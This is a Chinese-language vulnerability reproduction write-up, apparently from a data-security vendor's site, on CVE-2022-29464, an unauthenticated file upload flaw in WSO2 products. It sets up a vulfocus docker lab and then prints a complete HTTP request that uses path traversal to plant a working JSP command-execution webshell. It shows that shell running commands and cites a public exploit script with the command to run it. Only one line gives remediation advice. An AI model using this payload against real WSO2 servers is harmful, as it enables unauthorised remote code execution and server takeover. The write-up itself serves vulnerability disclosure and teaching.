四年同行,韧性共铸:西南某商行携手美创科技再度通过年度容灾大考
2025-12-26
以“AI+数据安全”领雁!祝贺美创牵头项目入选浙江省科技厅“尖兵领雁”计划 !
2025-12-22
美创AI灾备专家:引领灾备领域迈入“智能化”时代
2025-12-15
热点观察|美创科技丁斐:数据安全 × 价值共创?可信数据空间的 “双向奔赴”
2025-12-03
美创科技高校供应链数据安全方案斩获 2025 年度 “金智奖”
2025-12-03
存储域
数据库加密 诺亚防勒索访问域
数据库防水坝 数据库防火墙 数据库安全审计 动态脱敏流动域
静态脱敏 数据水印 API审计 API防控 医疗防统方运维服务
数据库运维服务 中间件运维服务 国产信创改造服务 驻场运维服务 供数服务安全咨询服务
数据出境安全治理服务 数据安全能力评估认证服务 数据安全风险评估服务 数据安全治理咨询服务 数据分类分级咨询服务 个人信息风险评估服务 数据安全检查服务CVE-2022-29464 WSO2文件上传漏洞是Orange Tsai发现的WSO2上的严重漏洞。该漏洞允许攻击者未授权上传jsp webshell从而在WSO2服务器上执行任意命令。
WSO2 API Manager 2.2.0—4.0.0
WSO2 Identity Server 5.2.0—5.11.0
WSO2 身份服务器5.4.0、5.4.1、5.5.0 和 5.6.0
WSO2 Enterprise Integrator 6.2.0—6.6.0
WSO2 身份服务器密钥管理器 5.3.0—5.10.0
可从vulfocus中拉取docker漏洞镜像,如图所示,执行命令
docker pull vulfocus/wso2-cve_2022_29464
拉取漏洞镜像
漏洞镜像拉取完成后,如图所示,执行命令
docker run -d -it -p 8280:8280 -p 8243:8243 -p 9443:9443 --name cve_2022_29464 vulfocus/wso2-cve_2022_29464
运行漏洞docker环境
漏洞环境启动完成后,访问
https://ip:9443
出现以下页面代表漏洞环境搭建成功
如图所示,构造如下数据包即可未授权在目标服务器上写入cmd webshell
POST /fileupload/toolsAny HTTP/1.1Host: 192.168.159.130:9443User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=4af6f362a86baadf5ec3177278d4911Cookie: session=0cb2ce62-1f82-4c51-8735-229398731d4f.XC9bRwlYo7x31-PjcBFWrJnuG_w; JSESSIONID=C7832D63E80798858C15459A4267966EUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteContent-Length: 805--4af6f362a86baadf5ec3177278d4911Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp"<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(newInputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"</br>"; } } catch(IOException e) { e.printStackTrace(); } }%> <pre><%=output %></pre>--4af6f362a86baadf5ec3177278d4911--
访问
https://192.168.159.130:9443/authenticationendpoint/cmd.jsp?cmd=whoami
构造参数cmd和参数值whoami,即可获得WSO2服务器whoami命令执行结果
也可通过漏洞EXP
https://github.com/hakivvi/CVE-2022-29464
利用漏洞
如图所示,将EXP下载后,执行
python exploit.py https://ip:9443/ shell.jsp
即可上传jsp cmdshell至WSO2服务器
访问
https://ip:9443//authenticationendpoint/shell.jsp
即可通过jsp cmdshell执行任意命令
将存在漏洞的WSO2应用版本升级至安全版本。